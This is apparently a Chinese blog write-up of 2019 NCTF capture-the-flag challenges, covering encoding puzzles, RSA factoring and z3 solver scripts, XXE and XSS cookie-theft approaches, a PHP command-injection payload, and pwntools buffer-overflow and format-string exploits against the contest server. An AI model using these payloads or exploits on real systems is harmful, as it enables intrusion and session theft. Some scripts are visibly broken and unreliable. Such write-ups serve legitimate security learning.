2019NCTF(some)

2019NCTF(some)

十一月 25, 2019 (Updated: )

2019-NCTF

是什么压垮了我的身躯,是沉重的专业课作业!!!这次比赛的时间刚好要我这个萌新肝作业,本来就菜,还遭遇如此变故,太难了。。。只来得及看了一点点题目时间就不够用了,唉,叭说了

MISC

问卷调查

做个问卷,无坑,还以为会在问卷里面遇到什么坑呢

pip install

这个题一开始没反应过来,作业使我僵化emmm

pip install --user 2019xxxxxx的命令安装pip库之后去查看该库的文件,只有安装记录和一个py脚本,内容是flag已经在本地了。

想到应该是安装脚本有东西,wget下载库包,直接查看其中的setup.py,发现东西

1
2
3
4
5
6
7
import tempfile
from os import path, system

tmp_file = tempfile.gettempdir() + path.sep + '.f14g_is_here'
f = open(tmp_file, 'w')
f.write('TkNURntjNHJlZnVsX2FiMHU3X2V2MWxfcGlwX3A0Y2thZ2V9')
f.close()

它在本地临时文件夹留下了.f14g_is_here,内容为TkNURntjNHJlZnVsX2FiMHU3X2V2MWxfcGlwX3A0Y2thZ2V9,直觉base64。

a_good_idea

直接改后缀解压缩,拿到俩张图一个hint

hint:寻找像素中的秘密

一开始以为是盲水印,发现没东西,用Stegsolve.jar对比俩张图也没东西,最后想到好久没见过的容差对比,用Beyond_Compare加载俩张图片直接看到二维码,扫码得flag

键盘侠

winhex查看,发现结尾数据不是图片结尾,是word文档,搜索FFD9,从图片数据结尾处手动提取出word数据保存出来。打开发现只有一句话,说有一串奇怪的字符,查看隐藏文字拿到该字符串

image-20191125164149476

image-20191125164758131

带特殊字符,长得像uu,一开始以为是uu,解不通,遂遍历各加密,其皆带殊字,无解,仅余base族未试,奈何需付费,终弃之。后经佬告知,python3.x的base64库带有base64以上的解密算法,可直接用。。。哭~~

最后用 python3 的 base85 解码得flag

what‘s this

存在压缩包,导出,解压得到.txt文件。

image-20191125195513454

image-20191125195540251

Base64隐写,跑一下脚本就行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import base64
f = open("What1s7his.txt","r")
data = f.readlines()
f.close()
print ord('N'),ord('C'),ord('T')

for i in data:
    str=''
    for j in i:
        str+=j
        if j=='=':
            break
    a=0
    for j in base64.b64decode(str):
        if ord(j)<=126 and ord(j)>=32:
            a+=1
    if a==32:
        print base64.b64decode(str)

Crypto

Keyboard

​ ooo yyy ii w uuu ee uuuu yyy uuuu y w uuu i i rr w i i rr rrr uuuu rrr uuuu t ii uuuu i w u rrr ee www ee yyy eee www w tt ee

都是26键第一行字母,和上面数字对应

​ q-1 w-2 e-3 r-4 t-5 y-6 u-7 i-8 o-9 p-0

9键对应过去

y 999 o 666 u 88 a 2 r 777 e 33 s 7777 o 666 s 7777

m 6 a 2 r 777 t 8 t 8 h 44 a 2 t 8 t 8 h 44 i 444

s 7777 i 444 s 7777 j 5 u 88 s 7777 t 8 a 2 p 7 i 444

e 33 c 222 e 33 o 666 f 333 c 222 a 2 k 55 e 33

NCTF{youaresosmartthatthisisjustapieceofcake}

babyrsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
# -*- coding: utf-8 -*-

from Crypto.Util.number import *
import gmpy2
import binascii
a = 0
b=[]
f=[2,2,2,2,2,2,3,5,7,7,29,31,61,101,33871,91781,112939]
e = 0x10001
d = 19275778946037899718035455438175509175723911466127462154506916564101519923603308900331427601983476886255849200332374081996442976307058597390881168155862238533018621944733299208108185814179466844504468163200369996564265921022888670062554504758512453217434777820468049494313818291727050400752551716550403647148197148884408264686846693842118387217753516963449753809860354047619256787869400297858568139700396567519469825398575103885487624463424429913017729585620877168171603444111464692841379661112075123399343270610272287865200880398193573260848268633461983435015031227070217852728240847398084414687146397303110709214913
c = 5382723168073828110696168558294206681757991149022777821127563301413483223874527233300721180839298617076705685041174247415826157096583055069337393987892262764211225227035880754417457056723909135525244957935906902665679777101130111392780237502928656225705262431431953003520093932924375902111280077255205118217436744112064069429678632923259898627997145803892753989255615273140300021040654505901442787810653626524305706316663169341797205752938755590056568986738227803487467274114398257187962140796551136220532809687606867385639367743705527511680719955380746377631156468689844150878381460560990755652899449340045313521804

def dfs(i,s):
    if(i==16):
        global a
        if(s<120000):
            b.append(s)
            a +=1
        if(s*f[i]<120000):
            b.append(s*f[i])
            a +=1
    else:
        dfs(i+1,s)
        dfs(i+1,s*f[i])

def nextPrime(n):
    n += 2 if n & 1 else 1
    while not isPrime(n):
        n += 2
    return n

x = e * d - 1
dfs(0,1)
for j in range(a):
    xx = x // b[j]
    for i in range(0,2000):
        xxx = xx + i * i
        if(gmpy2.iroot(xxx,2)[1]==1):
            p=gmpy2.iroot(xxx,2)[0] - i + 1
q = nextPrime(p)
n=p*q
m = pow(c,d,n)
m_hex = hex(m)[2:]
print((binascii.a2b_hex(m_hex)))

childyrsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from Crypto.Util.number import *
import gmpy2
import binascii
import fractions

n = 32849718197337581823002243717057659218502519004386996660885100592872201948834155543125924395614928962750579667346279456710633774501407292473006312537723894221717638059058796679686953564471994009285384798450493756900459225040360430847240975678450171551048783818642467506711424027848778367427338647282428667393241157151675410661015044633282064056800913282016363415202171926089293431012379261585078566301060173689328363696699811123592090204578098276704877408688525618732848817623879899628629300385790344366046641825507767709276622692835393219811283244303899850483748651722336996164724553364097066493953127153066970594638491950199605713033004684970381605908909693802373826516622872100822213645899846325022476318425889580091613323747640467299866189070780620292627043349618839126919699862580579994887507733838561768581933029077488033326056066378869170169389819542928899483936705521710423905128732013121538495096959944889076705471928490092476616709838980562233255542325528398956185421193665359897664110835645928646616337700617883946369110702443135980068553511927115723157704586595844927607636003501038871748639417378062348085980873502535098755568810971926925447913858894180171498580131088992227637341857123607600275137768132347158657063692388249513
c = 26308018356739853895382240109968894175166731283702927002165268998773708335216338997058314157717147131083296551313334042509806229853341488461087009955203854253313827608275460592785607739091992591431080342664081962030557042784864074533380701014585315663218783130162376176094773010478159362434331787279303302718098735574605469803801873109982473258207444342330633191849040553550708886593340770753064322410889048135425025715982196600650740987076486540674090923181664281515197679745907830107684777248532278645343716263686014941081417914622724906314960249945105011301731247324601620886782967217339340393853616450077105125391982689986178342417223392217085276465471102737594719932347242482670320801063191869471318313514407997326350065187904154229557706351355052446027159972546737213451422978211055778164578782156428466626894026103053360431281644645515155471301826844754338802352846095293421718249819728205538534652212984831283642472071669494851823123552827380737798609829706225744376667082534026874483482483127491533474306552210039386256062116345785870668331513725792053302188276682550672663353937781055621860101624242216671635824311412793495965628876036344731733142759495348248970313655381407241457118743532311394697763283681852908564387282605279108
e = 0x10001
a = 2
sqr=int(gmpy2.iroot(n,2)[0])

for p in sieve_base:
  i = 1
  for j in range(1):
​    i *=p
if(i>sqr):
break
  a = a*i

p=fractions.gcd(pow(3,a,n)-1,n)
q=n//p
phi_n = (p-1)*(q-1)
d = gmpy2.invert(e, phi_n)
m = pow(c,d,n)
m_hex = hex(m)[2:]

print((binascii.a2b_hex(m_hex)))

NCTF{Th3r3_ar3_1ns3cure_RSA_m0duli_7hat_at_f1rst_gl4nce_appe4r_t0_be_s3cur3}

sore

Vigenere Cipher ,没跑出来

Re

签到

真就签到鸭

image-20191125200000138

开头那个函数没啥用,sub_401340(&v4)用到了我们的输入,进去发现是一堆方程

image-20191125201907307

方程的运算结果已给出,用z3跑一下就行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
from z3 import *

solver = Solver()

flag = [Int('flag%d'%i) for i in range(49)]
for i in range(49):
    solver.add(flag[i]>=32)
    solver.add(flag[i]<=127)

str = [0,0,
  18564,  37316,  32053,  33278,  23993,  33151,  15248,  13719,  34137,  27391,  28639,  18453,  28465,  12384,  20780,  45085,  35827,  37243,  26037,  39409,  17583,  20825,  44474,  35138,  36914,  25918,  38915,  17672,  21219,  43935,  37072,  39359,  27793,  41447,  18098,  21335,  46164,  38698,  39084,  29205,  40913,  19117,  21786,  46573,  38322,  41017,  29298,  43409,  19655]

solver.add(str[2] == 34 * flag[3] + 12 * flag[0] + 53 * flag[1] + 6 * flag[2] + 58 * flag[4] + 36 * flag[5] + flag[6])
solver.add(str[3] == 27 * flag[4] + 73 * flag[3] + 12 * flag[2] + 83 * flag[0] + 85 * flag[1] + 96 * flag[5] + 52 * flag[6])
solver.add(str[4] == 24 * flag[2] + 78 * flag[0] + 53 * flag[1] + 36 * flag[3] + 86 * flag[4] + 25 * flag[5] + 46 * flag[6])
solver.add(str[5] == 78 * flag[1] + 39 * flag[0] + 52 * flag[2] + 9 * flag[3] + 62 * flag[4] + 37 * flag[5] + 84 * flag[6])
solver.add(str[6] == 48 * flag[4] + 6 * flag[1] + 23 * flag[0] + 14 * flag[2] + 74 * flag[3] + 12 * flag[5] + 83 * flag[6])
solver.add(str[7] == 15 * flag[5] + 48 * flag[4] + 92 * flag[2] + 85 * flag[1] + 27 * flag[0] + 42 * flag[3] + 72 * flag[6])
solver.add(str[8] == 26 * flag[5] + 67 * flag[3] + 6 * flag[1] + 4 * flag[0] + 3 * flag[2] + 68 * flag[6])
solver.add(str[9] == 34 * flag[10] + 12 * flag[7] + 53 * flag[8] + 6 * flag[9] + 58 * flag[11] + 36 * flag[12] + flag[13])
solver.add(str[10] == 27 * flag[11] + 73 * flag[10] + 12 * flag[9] + 83 * flag[7] + 85 * flag[8] + 96 * flag[12] + 52 * flag[13])
solver.add(str[11] == 24 * flag[9] + 78 * flag[7] + 53 * flag[8] + 36 * flag[10] + 86 * flag[11] + 25 * flag[12] + 46 * flag[13])
solver.add(str[12] == 78 * flag[8] + 39 * flag[7] + 52 * flag[9] + 9 * flag[10] + 62 * flag[11] + 37 * flag[12] + 84 * flag[13])
solver.add(str[13] == 48 * flag[11] + 6 * flag[8] + 23 * flag[7] + 14 * flag[9] + 74 * flag[10] + 12 * flag[12] + 83 * flag[13])
solver.add(str[14] == 15 * flag[12] + 48 * flag[11] + 92 * flag[9] + 85 * flag[8] + 27 * flag[7] + 42 * flag[10] + 72 * flag[13])
solver.add(str[15] == 26 * flag[12] + 67 * flag[10] + 6 * flag[8] + 4 * flag[7] + 3 * flag[9] + 68 * flag[13])
solver.add(str[16] == 34 * flag[17] + 12 * flag[14] + 53 * flag[15] + 6 * flag[16] + 58 * flag[18] + 36 * flag[19] + flag[20])
solver.add(str[17] == 27 * flag[18] + 73 * flag[17] + 12 * flag[16] + 83 * flag[14] + 85 * flag[15] + 96 * flag[19] + 52 * flag[20])
solver.add(str[18] == 24 * flag[16] + 78 * flag[14] + 53 * flag[15] + 36 * flag[17] + 86 * flag[18] + 25 * flag[19] + 46 * flag[20])
solver.add(str[19] == 78 * flag[15] + 39 * flag[14] + 52 * flag[16] + 9 * flag[17] + 62 * flag[18] + 37 * flag[19] + 84 * flag[20])
solver.add(str[20] == 48 * flag[18] + 6 * flag[15] + 23 * flag[14] + 14 * flag[16] + 74 * flag[17] + 12 * flag[19] + 83 * flag[20])
solver.add(str[21] == 15 * flag[19] + 48 * flag[18] + 92 * flag[16] + 85 * flag[15] + 27 * flag[14] + 42 * flag[17] + 72 * flag[20])
solver.add(str[22] == 26 * flag[19] + 67 * flag[17] + 6 * flag[15] + 4 * flag[14] + 3 * flag[16] + 68 * flag[20])
solver.add(str[23] == 34 * flag[24] + 12 * flag[21] + 53 * flag[22] + 6 * flag[23] + 58 * flag[25] + 36 * flag[26] + flag[27])
solver.add(str[24] == 27 * flag[25] + 73 * flag[24] + 12 * flag[23] + 83 * flag[21] + 85 * flag[22] + 96 * flag[26] + 52 * flag[27])
solver.add(str[25] == 24 * flag[23] + 78 * flag[21] + 53 * flag[22] + 36 * flag[24] + 86 * flag[25] + 25 * flag[26] + 46 * flag[27])
solver.add(str[26] == 78 * flag[22] + 39 * flag[21] + 52 * flag[23] + 9 * flag[24] + 62 * flag[25] + 37 * flag[26] + 84 * flag[27])
solver.add(str[27] == 48 * flag[25] + 6 * flag[22] + 23 * flag[21] + 14 * flag[23] + 74 * flag[24] + 12 * flag[26] + 83 * flag[27])
solver.add(str[28] == 15 * flag[26] + 48 * flag[25] + 92 * flag[23] + 85 * flag[22] + 27 * flag[21] + 42 * flag[24] + 72 * flag[27])
solver.add(str[29] == 26 * flag[26] + 67 * flag[24] + 6 * flag[22] + 4 * flag[21] + 3 * flag[23] + 68 * flag[27])
solver.add(str[30] == 34 * flag[31] + 12 * flag[28] + 53 * flag[29] + 6 * flag[30] + 58 * flag[32] + 36 * flag[33] + flag[34])
solver.add(str[31] == 27 * flag[32] + 73 * flag[31] + 12 * flag[30] + 83 * flag[28] + 85 * flag[29] + 96 * flag[33] + 52 * flag[34])
solver.add(str[32] == 24 * flag[30] + 78 * flag[28] + 53 * flag[29] + 36 * flag[31] + 86 * flag[32] + 25 * flag[33] + 46 * flag[34])
solver.add(str[33] == 78 * flag[29] + 39 * flag[28] + 52 * flag[30] + 9 * flag[31] + 62 * flag[32] + 37 * flag[33] + 84 * flag[34])
solver.add(str[34] == 48 * flag[32] + 6 * flag[29] + 23 * flag[28] + 14 * flag[30] + 74 * flag[31] + 12 * flag[33] + 83 * flag[34])
solver.add(str[35] == 15 * flag[33] + 48 * flag[32] + 92 * flag[30] + 85 * flag[29] + 27 * flag[28] + 42 * flag[31] + 72 * flag[34])
solver.add(str[36] == 26 * flag[33] + 67 * flag[31] + 6 * flag[29] + 4 * flag[28] + 3 * flag[30] + 68 * flag[34])
solver.add(str[37] == 34 * flag[38] + 12 * flag[35] + 53 * flag[36] + 6 * flag[37] + 58 * flag[39] + 36 * flag[40] + flag[41])
solver.add(str[38] == 27 * flag[39] + 73 * flag[38] + 12 * flag[37] + 83 * flag[35] + 85 * flag[36] + 96 * flag[40] + 52 * flag[41])
solver.add(str[39] == 24 * flag[37] + 78 * flag[35] + 53 * flag[36] + 36 * flag[38] + 86 * flag[39] + 25 * flag[40] + 46 * flag[41])
solver.add(str[40] == 78 * flag[36] + 39 * flag[35] + 52 * flag[37] + 9 * flag[38] + 62 * flag[39] + 37 * flag[40] + 84 * flag[41])
solver.add(str[41] == 48 * flag[39] + 6 * flag[36] + 23 * flag[35] + 14 * flag[37] + 74 * flag[38] + 12 * flag[40] + 83 * flag[41])
solver.add(str[42] == 15 * flag[40] + 48 * flag[39] + 92 * flag[37] + 85 * flag[36] + 27 * flag[35] + 42 * flag[38] + 72 * flag[41])
solver.add(str[43] == 26 * flag[40] + 67 * flag[38] + 6 * flag[36] + 4 * flag[35] + 3 * flag[37] + 68 * flag[41])
solver.add(str[44] == 34 * flag[45] + 12 * flag[42] + 53 * flag[43] + 6 * flag[44] + 58 * flag[46] + 36 * flag[47] + flag[48])
solver.add(str[45] == 27 * flag[46] + 73 * flag[45] + 12 * flag[44] + 83 * flag[42] + 85 * flag[43] + 96 * flag[47] + 52 * flag[48])
solver.add(str[46] == 24 * flag[44] + 78 * flag[42] + 53 * flag[43] + 36 * flag[45] + 86 * flag[46] + 25 * flag[47] + 46 * flag[48])
solver.add(str[47] == 78 * flag[43] + 39 * flag[42] + 52 * flag[44] + 9 * flag[45] + 62 * flag[46] + 37 * flag[47] + 84 * flag[48])
solver.add(str[48] == 48 * flag[46] + 6 * flag[43] + 23 * flag[42] + 14 * flag[44] + 74 * flag[45] + 12 * flag[47] + 83 * flag[48])
solver.add(str[49] == 15 * flag[47] + 48 * flag[46] + 92 * flag[44] + 85 * flag[43] + 27 * flag[42] + 42 * flag[45] + 72 * flag[48])
solver.add(str[50] == 26 * flag[47] + 67 * flag[45] + 6 * flag[43] + 4 * flag[42] + 3 * flag[44] + 68 * flag[48])

if solver.check() == sat:
    m = solver.model()
    s = []
    for i in range(49):
        s.append(m[flag[i]].as_long())
    print(bytes(s))
    print s
else:
    print('error')

str=''
for i in s:
    print i
    str+=chr(i)

print str

debug

image-20191125202546147

ida查看反编译源码,发现输入直接和字符串s**

Our 16bit Games

ida反编译在程序末尾发现一连串输出,其将一连串数据分别与ds:0fa2、ds:0fa4的值进行异或,应该就是flag了

image-20191125203551803

通过反推,发现ds:0fa2位置的参数通过了一连串检验,由检验算法可推出关键参数,c0h、deh

image-20191125204003878

1
2
3
4
5
6
7
8
9

a=[0x8E, 0x9D, 0xDA, xCD, 0x21, 0x86, 0xDF, 0xB4, 0x02, 0x94, 0x21, 0x86, 0xDF, 0xB4, x02, 0x98, , 0xBB, , 0x89, , 0xF3, , 0xEF, , 0x83, , 0xEE, , 0xAD, 0xB2, 0x9B,0x9F, ,0xEC, , 0x9F,0x9A, 0xF0, , 0xEB,0x9F, ,0x97, , 0xF6,0xBC, ,0xF1, 0xE9,0x9F, ,0xE7, , 0xA1,0xB3, 0xF3, 0xA3]

for i in range(30):
    if i % 2 == 0:
        a[i]=a[i]^0xc0
    else:
        a[i]=a[i]^0xde

WEB

Fake XML cookbook

题目提示flag在/flag
填写user和passwd之后抓包,经过测试在user处存在xxe
直接读flag

True XML cookbook

和上题一样xxe,提示要用xxe做更多东西
尝试下内网探测

Easyphp

第一关 绕过正则 num=23333%0a
第二关 str1纯数字,md5后str1和str2不相等,把cxhp换成0123后弱相等
写脚本跑出一个开头0e或者ce,后面字符串经过替换后为纯数字的纯数字字符串就是str1
Str1=9427417
Str2和str1类似,开头开头0e或者ce,后面字符串经过替换后为纯数字的字符串即为str2(str1和str2经过md5后不能同时0e开头且后面字符串为纯数字)
Str2=q0000653f8c
第三关
php中.会解析成_,q.w.q绕过第一个if
第二个if貌似没什么用
第三个if不能用cat
而且命令长度不能大于8
Ls看下当前目录发现flag文件,忘了叫啥名字挺长超过8了fl开头的
用通配符可以绕过
Cmd=tac fl
Payload: num=23333%0a&str1=9427417&str2=q0000653f8c&q.w.q=tac%20fl
Simple Xss
注册账号,登陆,发现可以给任何人发送消息,简单测试消息处存在xss
无任何过滤
给admin发打cookie的xss
抓到cookie浏览器修改本地cookie,F5,flag到手。。

pwn

hello pwn

1
2
3
4
5
6
from pwn import *

io = remote("139.129.76.65",50003)

io.interactive()

pwn me years!(I)

1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level = 'debug'
#r = process("./pwn_me_1")
r = remote('139.129.76.65',50004)
payload = 'yes\x00' + 'a'*12 + p64(0x66666666) + '\x00'
#gdb.attach(r)
r.sendline(payload)

r.interactive()

pwn me years!(II)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level = 'debug'
#r = process('./2')
r = remote('139.129.76.65',50005)
offset = 0x10
r.recvuntil('your name:\n')
r.sendline('a' * offset + '%p')
r.recvuntil('ring......\n')
get = r.recv(14)
#get = u64(r.recv()[0:6].ljust(8,'\x00'))
print 'leak = ' + get
get = int(get,16) - 0x202080
print 'addr = ' + hex(get)
target = get + 0x0000000002020E0
one = 0x66666666
target_len = len(str(target))
print 'target = ' + hex(target)

payload = "%" + str(0x6666) + "c%9$hn%10$hn"
payload = payload.ljust(0x18,"\x00")
payload += p64(target) + p64(target+2)
r.sendline(payload)
'''
payload="%" + str((one>>16)&0xffff)+'c'+"%9$hn"
payload+=p64(target+2)
r.recvuntil('you want?\n')
gdb.attach(r)
r.sendline(payload)
'''
r.interactive()
  1. 1. 2019-NCTF
    1. 1.1. MISC
      1. 1.1.1. 问卷调查
      2. 1.1.2. pip install
      3. 1.1.3. a_good_idea
      4. 1.1.4. 键盘侠
      5. 1.1.5. what‘s this
    2. 1.2. Crypto
      1. 1.2.1. Keyboard
      2. 1.2.2. babyrsa
      3. 1.2.3. childyrsa
      4. 1.2.4. sore
    3. 1.3. Re
      1. 1.3.1. 签到
      2. 1.3.2. debug
      3. 1.3.3. Our 16bit Games
    4. 1.4. WEB
      1. 1.4.1. Fake XML cookbook
      2. 1.4.2. True XML cookbook
      3. 1.4.3. Easyphp
    5. 1.5. pwn
      1. 1.5.1. hello pwn
      2. 1.5.2. pwn me years!(I)
      3. 1.5.3. pwn me years!(II)
隐藏